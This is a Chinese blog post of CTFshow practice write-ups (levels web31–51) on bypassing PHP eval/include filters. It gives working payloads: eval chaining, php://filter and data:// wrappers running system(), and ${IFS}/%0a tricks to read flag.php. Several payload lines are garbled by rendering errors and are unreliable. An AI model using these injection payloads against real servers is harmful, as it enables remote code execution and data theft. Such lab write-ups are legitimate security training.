命令注入ctfshow

最新推荐文章于 2025-07-22 19:29:13 发布
原创 最新推荐文章于 2025-07-22 19:29:13 发布 · 538 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文探讨了PHP中针对命令注入的CTF题目,涉及payload创建、字符过滤和编码技巧,如eval()、include、data伪协议和文件包含漏洞利用。重点展示了如何利用各种技术绕过安全检查,获取flag,以及官方提供的解决方案和提示。

title: CTFshow命令注入
date: 2021-07-15
tags: [ctf]
description: 刷题记录

搜索引擎http://helosec.com/
正则解释https://regexper.com/

web31

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤
flag system php cat sort shell . 空格 ’

payload:?c=eval($_GET[1]);&1=system(“cat flag.php”);

官方wp show_source(next(array_reverse(scandir(pos(localeconv())))));
array_reverse:以相反的元素顺序返回数组
scandir: 列出指定路径中的文件和目录
pos???
localeconv() 函数返回一包含本地数字及货币格式信息的数组。?????

web32

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

payload: ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
include:利用文件包含
php伪协议:php://filter/read=convert.base64-encode/resource=flag.php 用base64编码读取文件
base64在线解码:https://base64.us/

官方wp:c=nice=includenice=includenice=include_GET[“url”]?>&url=php://filter/read=convert.base64 encode/resource=flag.php
?>代替分号

web33

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤 “flag” “system” “php” “cat” “sort” “shell” “.” “ ” “’” “`” “echo” “;” “(” “"”
payload: ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
include:利用文件包含
php伪协议:php://filter/read=convert.base64-encode/resource=flag.php 用base64编码读取文件
base64在线解码:https://base64.us/

官方wp:c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-
encode/resource=flag.php
?><?干啥用?????

web34

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

payload: ?c=includeKaTeX parse error: Expected 'EOF', got '&' at position 10: _GET[1]?>&̲1=php://filter/…_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web35

。。。。。一模一样

web36

过滤数字把上面的1换成a

web 37

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

data伪协议
payload:?c=data://text/plain,<?php system($_POST[A]);?>
POST A=cat flag.php
官方wp:data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web38

过滤php
把<?php 换成 <=
data伪协议
payload:?c=data://text/plain,<?= system($_POST[A]);?>
POST A=cat flag.php

web39

如上
hint:data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用

web40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }        
}else{
    highlight_file(__FILE__);
}

过滤的中文括号
读取当前文件夹文件:?c=print_r(scandir(pos(localeconv())));
payload:?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
pos():返回数组中当前元素的值
scandir():获取目录下的文件
array_reverse():将数组逆序排列
next():函数将内部指针指向下一元素,并输出

官方wp:
show_source(next(array_reverse(scandir(pos(localeconv())))));
GXYCTF的禁止套娃 通过cookie获得参数进行命令执行
c=session_start();system(session_id());
passid=ls

web41

不会来个大佬教我!!!

web42

payload:c=ls;%0a也行||也行
;执行多个命令

web43

; cat 过滤
用%0a 和 tac 等等

web44

; cat flag过滤
用%0a 和 tac fla?.php fla*.php fl\ag.php等等

web45

过滤空格
echoIFS‘tacIFS`tacIFStacIFS*`%0A
payload:/?c=tac${IFS}fla?.php%0a
system中 ${IFS}代替空格

web46 web47 web48 web 49 web50

tac|more|less|curl|nl|tail|sort|strings读取

过滤了$
%09代替
/?c=tac%09fla?.php%0a(web50过滤%09)
nl<fla’'g.php||(查看源码)

web51

过滤,nl用nl,nl 用nl,nlnl{IFS}fla’'g.php||

CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 2332
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt中包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其中的敏感目录进行查看 其中/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码中存储了常用的密码 其中/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
CTF实验:web安全命令注入
floyd_art的博客
04-14 1227
信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 -A -v 靶场IP地址 探测目录信息 – nikto -host http://靶场IP地址:端口 – dirb http://靶场IP地址:端口 可利用信息 – robots.txt – nothing – secure – backup.zip 对于每一...
CTFphp里面的命令注入技巧
网络空间安全|人工智能|计算机科学
10-18 1441
CTF比赛和代码审计中经常使用的命令注入技巧
命令注入ctfshow sql day1
zbbjya的博客
03-29 451
使用工具 navicat for MySQL 下载地址:https://github.com/shaofeng666/Navicat-for-MySQL- 解压之后打开安装然后打开 我使用的是phpstudy启动 打开 记得关不然连接不上 正常输入就可以了 然后连接上创建一个数据库然后用就行了 浅试一下 测试一下看看能不能成功 说明可以连接成功并且执行sql语句 web ctfshow 171 从题目给的语句可以看出其是没有过滤的 新建一个表,在不是null加主键会自动填充 保存 保存好之后双击进去添加
CTF-show-SQL注入-1
qq_52696970的博客
03-24 310
From: https://blog.csdn.net/qq_61237064/article/details/121421239 https://blog.csdn.net/weixin_48083470/article/details/119034415 CTF-show-sql注入1、web1712、web1723、web1734、web174 1、web171 在网页中给出的用户表中可以看到ID=3后,数据无法显示,这说明有三个字段数 判断字段后,首先查询数据库名字: ctfshow_web 1'
SSTI模板注入-ctfshow web入门362
你们de4月天的博客
03-17 513
ctfshow web入门362详细讲解
ctfshow---sql注入(171-213)
fainpo的博客
05-01 1175
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询后查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
ctfshow web入门 SSTI注入 web361--web368
2301_81040377的博客
05-15 632
过滤了中括号 下划线 单引号 双引号 globals、getitem args。说实话这里对py不太好的朋友有点不友好,因为payload都是py的。这里用popen方法来执行命令。上题一样的payload可以用。这里是把引号过滤了我们可以用。然后使用flask过滤器。上题一样的payload。hint:考点就是题目。
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 2234
自用
CTFSHOW-WEB入门-命令执行29-32
2301_80024722的博客
01-29 866
【代码】CTFSHOW-WEB入门-命令执行29-32。
[CTFSHOW]SQL注入训练
Y4tacker的博客
11-02 1567
文章目录web171web172web173方法一方法二 web171 普通的sql注入,不做讲解 payload:1' union select id,username,password from ctfshow_user1 -- - web172 普通的sql注入,不做讲解 payload:1' union select id,username,password from ctfshow_user2 -- - web173 方法一 过滤了带有flag的输出,可以转换为16进制输出 1' union se
CTF—HTTP命令注入
IT小学子的博客
05-04 570
主机:192.168.32.152   靶机:192.168.32.167 首先nmap,nikto -host,dirb 探测 robots.txt目录下 在/nothing目录中,查看源码发现pass 在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开 然后发现mp3文件其实是text文本,cat打开 发现一段文字还有个url,打开url,用户...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 4100
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTF-18.web安全命令注入
woo233的博客
10-08 1498
上传webshell获取控制权使用burpsuite绕过上传过滤机制,绕过前端检测机制,或%00截断绕过;执行shell,获取反弹shell.
CTFHub】REC-命令注入
2301_76769195的博客
01-14 661
1. 命令注入-无过滤;2. 命令注入-过滤cat;3. 命令注入-过滤空格;4. 命令注入-过滤目录分隔符;5. 命令注入-过滤运算符;6. 命令注入-综合过滤练习。
CTFHUB web-rce-命令注入
2301_79783285的博客
12-17 1280
命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令的web应用中,如内容管理系统(CMS)等。后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接并执行 ,因此我们可以使用常见的命令拼接字符对命令进行拼接,如使用“&”,“|”,“&&”,“||”等,linux系统下还可以使用“;”,“``”。Windows支持的管道符。
CTFHUB-RCE-命令注入
u014794539的博客
07-10 1421
命令注入 无过滤 考点 属于是纯纯的命令注入 思路分析 构造playload 127.0.0.1|ls 发现一个数字串挺长的php 构造 127.0.0.1|cat 18930164348325.php 提交了[1]没有东西 可以构造 127.0.0.1|cat 18930164348325.php|base64 然后base64解码 或者不加base64 查看源码也能得到 playload: ctfhub{af6df24d6b085066d0dc46d3} 过滤cat 考点 过滤cat
绕过过滤的CTF命令注入实战
最新发布
z20201213的博客
07-22 253
拿到flag文件名,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资料得知,空格可以用$*在shell命令执行下为空,接下来查找 flag_is_here ,尝试发现很多字符被过滤了。url编码中,%0a是换行符,%0d是回车符,可以用这两个进行命令拼接。被过滤了,改用换行符。我这里使用Hex编码查看,查看源代码找到flag。先查找目录,发现不行。
命令执行漏洞ctfshow
12-27
### CTFShow 命令执行漏洞 解题思路 分析 #### 题目环境概述 在给定的 PHP 代码片段中,存在一个 GET 参数 `c` 的处理逻辑[^1]。当接收到此参数时,程序会检查该字符串是否包含敏感关键字 "flag"(不区分大小写),如果不包含,则通过 `eval()` 函数直接执行传入的内容。 ```php <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } } else { highlight_file(__FILE__); } ?> ``` 这种设计方式非常危险,因为它允许攻击者提交任意 PHP 代码并被执行,除非这些代码包含了特定的关键字 "flag"。这实际上是一个典型的命令注入漏洞实例。 #### 利用技巧探讨 为了绕过检测机制,可以考虑采用多种手段来规避关键词过滤: - **编码转换**:尝试使用 URL 编码或者其他形式的数据编码技术改变输入格式; - **字符替换**:寻找其他能够实现相同功能但不会触发正则表达式的替代方案; - **多阶段载荷构建**:分步构造最终要运行的有效负载,使得每一步都不违反规则; 对于本案例而言,由于不允许出现 “flag”,因此可以通过巧妙地组合变量名或其他合法语法结构,在不影响实际效果的前提下避开这个限制条件。 #### 实际操作建议 假设目标是在服务器上读取某个文件中的标志位信息(即所谓的 'flag')。考虑到上述提到的安全措施,一种可能的方法如下所示: ```bash ?c=$a='fl';$b='ag';echo$$a.$b; ``` 这段代码创建了两个独立的部分 `$a` 和 `$b` 并将其拼接起来形成完整的单词 "flag",从而成功避开了简单的模式匹配检查[^3]。 另外值得注意的是,在某些情况下还可以借助于 PHP 内置的功能特性来进行间接调用,比如利用反向 shell 或者其他 WebShell 技术获取更深层次的操作权限。 #### 安全提示 尽管这里讨论的技术细节主要用于教育目的以及提高网络安全意识,但在真实环境中应当严格遵循最佳实践指南,确保应用程序和服务免受此类威胁的影响。开发人员应该始终采取适当的安全防护措施,如禁用不必要的函数、实施严格的输入验证等策略防止潜在风险的发生。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值